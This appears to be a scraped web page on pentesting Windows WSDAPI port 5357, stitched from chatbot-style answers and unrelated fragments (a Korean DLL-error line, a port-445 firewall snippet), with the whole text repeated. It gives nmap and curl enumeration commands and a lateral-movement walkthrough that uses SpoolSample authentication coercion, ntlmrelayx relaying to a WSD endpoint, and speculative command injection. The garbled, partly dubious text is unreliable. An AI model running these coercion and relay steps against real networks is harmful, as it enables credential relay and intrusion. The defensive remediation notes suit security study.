# Service discovery
nmap -p 5357 <target>

Port 5357 is used by the Web Services for Devices (WSD) API — a Microsoft implementation that allows networked devices (printers, scanners, cameras, IoT appliances) and Windows hosts to discover and communicate with each other over HTTP-like endpoints. Because WSD exposes device management and discovery functionality, misconfigured or exposed WSD endpoints can reveal device information, let administrators or services be manipulated remotely, or provide an entry point for lateral movement.


Port 5357 is used by WSDAPI for device discovery and control (e.g., network scanners, printers, media servers). It's part of WSD (Web Services on Devices) — Microsoft's implementation of devices profile for web services (DPWS).


# Using wsd-client tools (if installed)
wsdd – discover



Port 5357 is primarily associated with Web Services for Devices (WSDAPI)


, a Microsoft implementation used for discovering and communicating with network-connected devices like printers and scanners over HTTP. The Role of Port 5357


On modern Windows systems, Port 5357 (TCP) acts as a local web server for the


. It allows devices to advertise their presence and services on a local network without manual configuration. While useful for seamless hardware integration, it often presents a surface for information gathering during a security assessment. Security Implications and Pentesting According to methodologies found on resources like HackTricks


, every open port is a potential entry point or data source. For Port 5357, the primary risks include: Information Disclosure


: The service can leak metadata such as device hostnames, manufacturer details, and network paths. Attackers use this for fingerprinting


the internal network to identify specific Windows versions or hardware models. Vulnerability Surface


: Historically, this service has been susceptible to memory corruption. For example, Microsoft Security Bulletin MS09-063


addressed a critical vulnerability where specially crafted headers could lead to remote code execution. Lateral Movement


: By interacting with WSD, an attacker might identify other vulnerable devices on the subnet that wouldn't otherwise be visible through standard scanning. Practical Assessment Steps


If you encounter Port 5357 during a scan, consider the following: Identify the Process : Use commands like netstat -anb | find "5357"


to verify that the system is actively listening and to confirm it is indeed the Windows WSD service. Service Probing


: Attempt to browse the port via HTTP. While it may not serve a traditional webpage, it may respond with XML data or SOAP responses that reveal device identity. Network Context


: Note that this port is typically open in unmanaged or small office networks where "Network Discovery" is enabled. In highly secured environments, hardening recommendations


suggest blocking this port at the firewall level to prevent unnecessary information leakage. specific Nmap scripts for enumerating WSD services, or are you looking for firewall configuration steps to secure this port?


  Port 5357 is typically associated with the Web Services for Devices API (WSDAPI), a Microsoft implementation of the WS-Discovery protocol. It allows devices like printers and scanners to be automatically discovered on a local network.


While HackTricks does not currently have a dedicated page for Port 5357, the port is an extension of standard Windows network discovery services. Here is the technical breakdown for security assessment and enumeration. Port 5357 Service Details Protocol: TCP Service: Web Services for Devices (WSD) / wsdapi


Process: Often identified as mshttpapi or part of the Windows HTTP Server Stack.


Function: It provides an HTTP-based discovery mechanism. When accessed via a browser, it may return a "404 Not Found" or a simple status message if the service is active but not configured to serve a root page. Enumeration & Pentesting Approach


If you encounter Port 5357 during a scan, you can use these methods to gather more information:


Banner Grabbing & Nmap Scanning:Identify the specific version of the HTTP server running on the port. nmap -sV -p 5357   Use code with caution.   Copied to clipboard


Information Leakage Check:Port 5357 has been noted as a potential source for information leaks. Use tools like curl to check for XML responses that might reveal device names, manufacturer details, or network configurations. curl -v http://:5357/  Use code with caution.   Copied to clipboard


Cross-Referencing WS-Discovery (UDP 3702):Since 5357 is the HTTP unicast part of WSD, it is often paired with UDP port 3702, which handles multicast discovery. Pentesting the UDP discovery service can often provide more detailed device information than the TCP port alone. Vulnerability Context


System Identification: If this port is open, it strongly indicates the target is a Windows-based system (Vista or later) with network discovery enabled.


Attack Surface: While there are no widespread "one-click" exploits for Port 5357 itself, it increases the target's attack surface by confirming the operating system and potentially leaking internal metadata about connected hardware.


Remediation: If network discovery is not required, this service can be disabled by turning off "Network Discovery" in the Windows Sharing settings or blocking the port via Windows Defender Firewall.      How to block TCP port 445 in Windows - ManageEngine


Step 1: Open the Control Panel Step 2: Click on Windows Firewall/ Windows Defender firewall Step 3: Navigate to advanced settings. ManageEngine  Penetration Testing: Re: Port 5357 -- Vista SP1 ???




nmap -sV -sC -p5357 10.10.10.5



Output might show:


5357/tcp open  http   Microsoft HTTPAPI httpd 2.0
|_http-title: Service Unavailable
|_http-server-header: Microsoft-HTTPAPI/2.0



The metadata URL is XML that contains actions (operations) the device supports.


curl http://10.10.10.5:5357/wsd/3f8c2a1b/metadata



Look for <wsdp:Get> – this allows you to request internal device info.


You have a foothold on WORKSTATION-A (192.168.1.10). Scanning finds 192.168.1.50:5357 open.


Step 1: Coerce Authentication
Using SpoolSample.exe:


SpoolSample.exe TARGET-50 AttackerPC



This forces TARGET-50 (WSD-enabled printer server) to authenticate to your machine on SMB.


Step 2: Relay to WSD


ntlmrelayx.py -t http://192.168.1.50:5357/wsd/endpoint -wh 192.168.1.100 -smb2support



If successful, you might get device control or even SYSTEM.


Step 3: Command Injection via WSD Action
Some WSD implementations accept a Set action. Fuzzing the metadata might reveal an action like SetSystemTime or ExecuteCommand (rare but happens in embedded devices).
port 5357 hacktricks

MSVCP120.dll 에러 해결

Port 5357 Hacktricks - 

# Service discovery
nmap -p 5357 <target>

Port 5357 is used by the Web Services for Devices (WSD) API — a Microsoft implementation that allows networked devices (printers, scanners, cameras, IoT appliances) and Windows hosts to discover and communicate with each other over HTTP-like endpoints. Because WSD exposes device management and discovery functionality, misconfigured or exposed WSD endpoints can reveal device information, let administrators or services be manipulated remotely, or provide an entry point for lateral movement.


Port 5357 is used by WSDAPI for device discovery and control (e.g., network scanners, printers, media servers). It's part of WSD (Web Services on Devices) — Microsoft's implementation of devices profile for web services (DPWS).


# Using wsd-client tools (if installed)
wsdd – discover



Port 5357 is primarily associated with Web Services for Devices (WSDAPI)


, a Microsoft implementation used for discovering and communicating with network-connected devices like printers and scanners over HTTP. The Role of Port 5357


On modern Windows systems, Port 5357 (TCP) acts as a local web server for the


. It allows devices to advertise their presence and services on a local network without manual configuration. While useful for seamless hardware integration, it often presents a surface for information gathering during a security assessment. Security Implications and Pentesting According to methodologies found on resources like HackTricks


, every open port is a potential entry point or data source. For Port 5357, the primary risks include: Information Disclosure


: The service can leak metadata such as device hostnames, manufacturer details, and network paths. Attackers use this for fingerprinting


the internal network to identify specific Windows versions or hardware models. Vulnerability Surface


: Historically, this service has been susceptible to memory corruption. For example, Microsoft Security Bulletin MS09-063 port 5357 hacktricks


addressed a critical vulnerability where specially crafted headers could lead to remote code execution. Lateral Movement


: By interacting with WSD, an attacker might identify other vulnerable devices on the subnet that wouldn't otherwise be visible through standard scanning. Practical Assessment Steps


If you encounter Port 5357 during a scan, consider the following: Identify the Process : Use commands like netstat -anb | find "5357"


to verify that the system is actively listening and to confirm it is indeed the Windows WSD service. Service Probing


: Attempt to browse the port via HTTP. While it may not serve a traditional webpage, it may respond with XML data or SOAP responses that reveal device identity. Network Context


: Note that this port is typically open in unmanaged or small office networks where "Network Discovery" is enabled. In highly secured environments, hardening recommendations


suggest blocking this port at the firewall level to prevent unnecessary information leakage. specific Nmap scripts for enumerating WSD services, or are you looking for firewall configuration steps to secure this port?


  Port 5357 is typically associated with the Web Services for Devices API (WSDAPI), a Microsoft implementation of the WS-Discovery protocol. It allows devices like printers and scanners to be automatically discovered on a local network.


While HackTricks does not currently have a dedicated page for Port 5357, the port is an extension of standard Windows network discovery services. Here is the technical breakdown for security assessment and enumeration. Port 5357 Service Details Protocol: TCP Service: Web Services for Devices (WSD) / wsdapi # Service discovery nmap -p 5357 &lt;target&gt; Port


Process: Often identified as mshttpapi or part of the Windows HTTP Server Stack.


Function: It provides an HTTP-based discovery mechanism. When accessed via a browser, it may return a "404 Not Found" or a simple status message if the service is active but not configured to serve a root page. Enumeration & Pentesting Approach


If you encounter Port 5357 during a scan, you can use these methods to gather more information:


Banner Grabbing & Nmap Scanning:Identify the specific version of the HTTP server running on the port. nmap -sV -p 5357   Use code with caution.   Copied to clipboard


Information Leakage Check:Port 5357 has been noted as a potential source for information leaks. Use tools like curl to check for XML responses that might reveal device names, manufacturer details, or network configurations. curl -v http://:5357/  Use code with caution.   Copied to clipboard


Cross-Referencing WS-Discovery (UDP 3702):Since 5357 is the HTTP unicast part of WSD, it is often paired with UDP port 3702, which handles multicast discovery. Pentesting the UDP discovery service can often provide more detailed device information than the TCP port alone. Vulnerability Context


System Identification: If this port is open, it strongly indicates the target is a Windows-based system (Vista or later) with network discovery enabled.


Attack Surface: While there are no widespread "one-click" exploits for Port 5357 itself, it increases the target's attack surface by confirming the operating system and potentially leaking internal metadata about connected hardware.


Remediation: If network discovery is not required, this service can be disabled by turning off "Network Discovery" in the Windows Sharing settings or blocking the port via Windows Defender Firewall.      How to block TCP port 445 in Windows - ManageEngine Port 5357 is primarily associated with Web Services


Step 1: Open the Control Panel Step 2: Click on Windows Firewall/ Windows Defender firewall Step 3: Navigate to advanced settings. ManageEngine  Penetration Testing: Re: Port 5357 -- Vista SP1 ???




nmap -sV -sC -p5357 10.10.10.5



Output might show:


5357/tcp open  http   Microsoft HTTPAPI httpd 2.0
|_http-title: Service Unavailable
|_http-server-header: Microsoft-HTTPAPI/2.0



The metadata URL is XML that contains actions (operations) the device supports.


curl http://10.10.10.5:5357/wsd/3f8c2a1b/metadata



Look for <wsdp:Get> – this allows you to request internal device info.


You have a foothold on WORKSTATION-A (192.168.1.10). Scanning finds 192.168.1.50:5357 open.


Step 1: Coerce Authentication
Using SpoolSample.exe:


SpoolSample.exe TARGET-50 AttackerPC



This forces TARGET-50 (WSD-enabled printer server) to authenticate to your machine on SMB.


Step 2: Relay to WSD


ntlmrelayx.py -t http://192.168.1.50:5357/wsd/endpoint -wh 192.168.1.100 -smb2support



If successful, you might get device control or even SYSTEM.


Step 3: Command Injection via WSD Action
Some WSD implementations accept a Set action. Fuzzing the metadata might reveal an action like SetSystemTime or ExecuteCommand (rare but happens in embedded devices).